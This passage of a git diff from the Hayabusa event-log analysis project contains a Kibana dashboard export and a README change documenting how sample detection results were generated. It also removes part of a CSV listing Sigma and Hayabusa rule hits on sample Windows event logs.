Level\",\"description\":\"\",\"visualizationType\":\"lnsPie\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-41bca02b-ab6b-4422-9761-edadaf1e95ce\"}],\"state\":{\"visualization\":{\"shape\":\"pie\",\"layers\":[{\"layerId\":\"41bca02b-ab6b-4422-9761-edadaf1e95ce\",\"groups\":[\"28876efd-84a4-4ebb-9d29-998b1c6d53f6\"],\"metric\":\"4c54f46f-5df6-43a6-8200-10ae8a112f44\",\"numberDisplay\":\"percent\",\"categoryDisplay\":\"default\",\"legendDisplay\":\"default\",\"nestedLegend\":false,\"layerType\":\"data\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"41bca02b-ab6b-4422-9761-edadaf1e95ce\":{\"columns\":{\"28876efd-84a4-4ebb-9d29-998b1c6d53f6\":{\"label\":\"Top values of Level\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Level\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"4c54f46f-5df6-43a6-8200-10ae8a112f44\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"4c54f46f-5df6-43a6-8200-10ae8a112f44\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"28876efd-84a4-4ebb-9d29-998b1c6d53f6\",\"4c54f46f-5df6-43a6-8200-10ae8a112f44\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":12,\"y\":0,\"w\":11,\"h\":17,\"i\":\"738fb5e1-834b-465e-b6ba-4de422c663d9\"},\"panelIndex\":\"738fb5e1-834b-465e-b6ba-4de422c663d9\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Detection 
Rule\",\"description\":\"\",\"visualizationType\":\"lnsPie\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-aaacd848-cb93-46e9-acf1-070f6b39dace\"}],\"state\":{\"visualization\":{\"shape\":\"donut\",\"layers\":[{\"layerId\":\"aaacd848-cb93-46e9-acf1-070f6b39dace\",\"groups\":[\"7eae6d74-b193-42e1-b5c4-c5fb6c7deb12\"],\"metric\":\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\",\"numberDisplay\":\"percent\",\"categoryDisplay\":\"default\",\"legendDisplay\":\"default\",\"nestedLegend\":false,\"layerType\":\"data\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"aaacd848-cb93-46e9-acf1-070f6b39dace\":{\"columns\":{\"7eae6d74-b193-42e1-b5c4-c5fb6c7deb12\":{\"label\":\"Top values of RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"7eae6d74-b193-42e1-b5c4-c5fb6c7deb12\",\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":23,\"y\":0,\"w\":11,\"h\":17,\"i\":\"54a171e3-5440-4171-8991-e07417a3e2cd\"},\"panelIndex\":\"54a171e3-5440-4171-8991-e07417a3e2cd\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Event 
ID\",\"description\":\"\",\"visualizationType\":\"lnsPie\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-4dd9733a-b2c3-449d-a7b8-78bf2f7621ab\"}],\"state\":{\"visualization\":{\"shape\":\"donut\",\"layers\":[{\"layerId\":\"4dd9733a-b2c3-449d-a7b8-78bf2f7621ab\",\"groups\":[\"090a1665-f0e8-4450-bfd0-d76eb9e9e7fd\"],\"metric\":\"8459d081-19df-43db-a545-120ed19db287\",\"numberDisplay\":\"percent\",\"categoryDisplay\":\"default\",\"legendDisplay\":\"default\",\"nestedLegend\":false,\"layerType\":\"data\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"4dd9733a-b2c3-449d-a7b8-78bf2f7621ab\":{\"columns\":{\"090a1665-f0e8-4450-bfd0-d76eb9e9e7fd\":{\"label\":\"Top values of EventID\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"EventID\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"8459d081-19df-43db-a545-120ed19db287\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"8459d081-19df-43db-a545-120ed19db287\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"090a1665-f0e8-4450-bfd0-d76eb9e9e7fd\",\"8459d081-19df-43db-a545-120ed19db287\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":34,\"y\":0,\"w\":11,\"h\":17,\"i\":\"2d258460-f836-4b9b-9e32-6bce96b0851b\"},\"panelIndex\":\"2d258460-f836-4b9b-9e32-6bce96b0851b\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Computer 
Names\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-a2f6321e-66ca-44f9-b1b5-a64203a0333f\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"abf4669d-ca1a-4e29-bf6b-580c0155bc9a\"},{\"isTransposed\":false,\"columnId\":\"18cef55c-e7fa-4178-8e2f-9708acbe4254\"}],\"layerId\":\"a2f6321e-66ca-44f9-b1b5-a64203a0333f\",\"layerType\":\"data\"},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"a2f6321e-66ca-44f9-b1b5-a64203a0333f\":{\"columns\":{\"abf4669d-ca1a-4e29-bf6b-580c0155bc9a\":{\"label\":\"Top values of Computer\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Computer\",\"isBucketed\":true,\"params\":{\"size\":10,\"orderBy\":{\"type\":\"column\",\"columnId\":\"18cef55c-e7fa-4178-8e2f-9708acbe4254\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"18cef55c-e7fa-4178-8e2f-9708acbe4254\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"abf4669d-ca1a-4e29-bf6b-580c0155bc9a\",\"18cef55c-e7fa-4178-8e2f-9708acbe4254\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":0,\"y\":17,\"w\":45,\"h\":13,\"i\":\"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0\"},\"panelIndex\":\"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Risk Over 
Time\",\"description\":\"\",\"visualizationType\":\"lnsXY\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-75d03fdf-bd36-47d9-851c-a78cacecb37f\"}],\"state\":{\"visualization\":{\"legend\":{\"isVisible\":true,\"position\":\"right\"},\"valueLabels\":\"hide\",\"fittingFunction\":\"None\",\"yLeftExtent\":{\"mode\":\"full\"},\"yRightExtent\":{\"mode\":\"full\"},\"axisTitlesVisibilitySettings\":{\"x\":true,\"yLeft\":true,\"yRight\":true},\"tickLabelsVisibilitySettings\":{\"x\":true,\"yLeft\":true,\"yRight\":true},\"labelsOrientation\":{\"x\":0,\"yLeft\":0,\"yRight\":0},\"gridlinesVisibilitySettings\":{\"x\":true,\"yLeft\":true,\"yRight\":true},\"preferredSeriesType\":\"bar_stacked\",\"layers\":[{\"layerId\":\"75d03fdf-bd36-47d9-851c-a78cacecb37f\",\"accessors\":[\"c5277819-371a-4f5a-97e4-df763b276b1f\"],\"position\":\"top\",\"seriesType\":\"bar_stacked\",\"showGridlines\":false,\"layerType\":\"data\",\"xAccessor\":\"4c31cd0a-08e8-4266-910d-14717b06ac2f\",\"splitAccessor\":\"8ebfda45-9671-4fb6-a253-06b90d989ae3\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"75d03fdf-bd36-47d9-851c-a78cacecb37f\":{\"columns\":{\"8ebfda45-9671-4fb6-a253-06b90d989ae3\":{\"label\":\"Top values of 
Level\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Level\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"c5277819-371a-4f5a-97e4-df763b276b1f\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"4c31cd0a-08e8-4266-910d-14717b06ac2f\":{\"label\":\"@timestamp\",\"dataType\":\"date\",\"operationType\":\"date_histogram\",\"sourceField\":\"@timestamp\",\"isBucketed\":true,\"scale\":\"interval\",\"params\":{\"interval\":\"auto\"}},\"c5277819-371a-4f5a-97e4-df763b276b1f\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"8ebfda45-9671-4fb6-a253-06b90d989ae3\",\"4c31cd0a-08e8-4266-910d-14717b06ac2f\",\"c5277819-371a-4f5a-97e4-df763b276b1f\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":0,\"y\":30,\"w\":20,\"h\":17,\"i\":\"d18ce65d-f280-4428-a6a7-6cebe812efd7\"},\"panelIndex\":\"d18ce65d-f280-4428-a6a7-6cebe812efd7\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Top 10 
Alerts\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-ad48706c-2160-4d2f-93e9-afba4411ac58\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"841c01be-d9b7-4dba-a2b3-11f449677fac\"},{\"isTransposed\":false,\"columnId\":\"8448dbd4-ea47-435e-a197-6f17a6eae336\"},{\"columnId\":\"d815af3a-f2de-49cc-a5bf-742519a538e5\",\"isTransposed\":true}],\"layerId\":\"ad48706c-2160-4d2f-93e9-afba4411ac58\",\"layerType\":\"data\"},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"ad48706c-2160-4d2f-93e9-afba4411ac58\":{\"columns\":{\"841c01be-d9b7-4dba-a2b3-11f449677fac\":{\"label\":\"Top values of RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"8448dbd4-ea47-435e-a197-6f17a6eae336\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"8448dbd4-ea47-435e-a197-6f17a6eae336\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"},\"d815af3a-f2de-49cc-a5bf-742519a538e5\":{\"label\":\"Top values of 
Level\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Level\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"8448dbd4-ea47-435e-a197-6f17a6eae336\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}}},\"columnOrder\":[\"d815af3a-f2de-49cc-a5bf-742519a538e5\",\"841c01be-d9b7-4dba-a2b3-11f449677fac\",\"8448dbd4-ea47-435e-a197-6f17a6eae336\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":20,\"y\":30,\"w\":13,\"h\":17,\"i\":\"7e2d20a9-16d4-4c02-9859-b6ac2798355d\"},\"panelIndex\":\"7e2d20a9-16d4-4c02-9859-b6ac2798355d\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Top 10 Critical Alerts\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-bc8d7445-5f2c-4a8d-b771-1c19138bf11e\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"aa763230-c5d1-43bc-8606-b58c20380b9f\"},{\"isTransposed\":false,\"columnId\":\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\"}],\"layerId\":\"bc8d7445-5f2c-4a8d-b771-1c19138bf11e\",\"layerType\":\"data\"},\"query\":{\"query\":\"Level:\\\"critical\\\" \",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"bc8d7445-5f2c-4a8d-b771-1c19138bf11e\":{\"columns\":{\"aa763230-c5d1-43bc-8606-b58c20380b9f\":{\"label\":\"Top values of 
RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":10,\"orderBy\":{\"type\":\"column\",\"columnId\":\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"aa763230-c5d1-43bc-8606-b58c20380b9f\",\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":33,\"y\":30,\"w\":12,\"h\":17,\"i\":\"721424a7-8543-445e-8b33-59666fc98f2a\"},\"panelIndex\":\"721424a7-8543-445e-8b33-59666fc98f2a\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Top 10 High Alerts\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-90df50b6-ceec-47d6-8609-a4cf7e6f7ec0\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"eadb527b-9160-4fd2-9d4d-4059f4dd3a6b\"},{\"isTransposed\":false,\"columnId\":\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\"}],\"layerId\":\"90df50b6-ceec-47d6-8609-a4cf7e6f7ec0\",\"layerType\":\"data\"},\"query\":{\"query\":\"Level:\\\"high\\\" \",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"90df50b6-ceec-47d6-8609-a4cf7e6f7ec0\":{\"columns\":{\"eadb527b-9160-4fd2-9d4d-4059f4dd3a6b\":{\"label\":\"Top values of 
RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":10,\"orderBy\":{\"type\":\"column\",\"columnId\":\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"eadb527b-9160-4fd2-9d4d-4059f4dd3a6b\",\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":47,\"w\":45,\"h\":30,\"i\":\"dda19205-5619-4f11-b6ec-e33c86cfb330\"},\"panelIndex\":\"dda19205-5619-4f11-b6ec-e33c86cfb330\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_dda19205-5619-4f11-b6ec-e33c86cfb330\"}]","timeRestore":false,"title":"Hayabusa 
Dashboard","version":1},"coreMigrationVersion":"7.17.1","id":"332ec800-bc67-11ec-b4f7-8347b07fe863","migrationVersion":{"dashboard":"7.17.0"},"references":[{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"1af33197-eac8-463d-ae7e-3b8a89568122:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"1af33197-eac8-463d-ae7e-3b8a89568122:indexpattern-datasource-layer-41bca02b-ab6b-4422-9761-edadaf1e95ce","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"738fb5e1-834b-465e-b6ba-4de422c663d9:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"738fb5e1-834b-465e-b6ba-4de422c663d9:indexpattern-datasource-layer-aaacd848-cb93-46e9-acf1-070f6b39dace","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"54a171e3-5440-4171-8991-e07417a3e2cd:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"54a171e3-5440-4171-8991-e07417a3e2cd:indexpattern-datasource-layer-4dd9733a-b2c3-449d-a7b8-78bf2f7621ab","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"2d258460-f836-4b9b-9e32-6bce96b0851b:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"2d258460-f836-4b9b-9e32-6bce96b0851b:indexpattern-datasource-layer-a2f6321e-66ca-44f9-b1b5-a64203a0333f","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0:indexpattern-datasource-layer-75d03fdf-bd36-47d9-851c-a78cacecb37f","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"d18ce65d-f280-4428-a6a7-6cebe812efd7:indexpattern-datasource-current-indexpattern
","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"d18ce65d-f280-4428-a6a7-6cebe812efd7:indexpattern-datasource-layer-ad48706c-2160-4d2f-93e9-afba4411ac58","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7e2d20a9-16d4-4c02-9859-b6ac2798355d:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7e2d20a9-16d4-4c02-9859-b6ac2798355d:indexpattern-datasource-layer-bc8d7445-5f2c-4a8d-b771-1c19138bf11e","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"721424a7-8543-445e-8b33-59666fc98f2a:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"721424a7-8543-445e-8b33-59666fc98f2a:indexpattern-datasource-layer-90df50b6-ceec-47d6-8609-a4cf7e6f7ec0","type":"index-pattern"},{"id":"d0e3ad60-bc6a-11ec-b4f7-8347b07fe863","name":"dda19205-5619-4f11-b6ec-e33c86cfb330:panel_dda19205-5619-4f11-b6ec-e33c86cfb330","type":"search"}],"type":"dashboard","updated_at":"2022-04-15T03:25:13.683Z","version":"WzE3MzQsM10="} +{"excludedObjects":[],"excludedObjectsCount":0,"exportedCount":3,"missingRefCount":0,"missingReferences":[]} \ No newline at end of file diff --git a/sample-results/README.md b/sample-results/README.md index 7cfd8937..1fe9e0c2 100644 --- a/sample-results/README.md +++ b/sample-results/README.md 
@@ -1,11 +1,6 @@ -`hayabusa-sample-evtx-ResultsDefaultSettings.csv` was created by running: +`hayabusa-sample-results-2022-04-16.csv` was created by running: ```bash -hayabusa.exe -d ./hayabusa-sample-evtx -o hayabusa-sample-evtx-ResultsDefaultSettings.csv +hayabusa.exe -d ./hayabusa-sample-evtx -o hayabusa-sample-results-2022-04-16.csv -U ``` -`hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv` was created running: -```bash -hayabusa.exe -d ./hayabusa-sample-evtx -D -n -o hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv -``` - -The two .xlsx files were created in Excel after importing the CSV files and manually adding color to the different severity levels. +The sample evtx files used came from [this](https://github.com/Yamato-Security/hayabusa-sample-evtx) repository. \ No newline at end of file diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv deleted file mode 100644 index 0ae6f001..00000000 --- a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv +++ /dev/null 
@@ -1,10073 +0,0 @@ -Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath -2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : 
SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 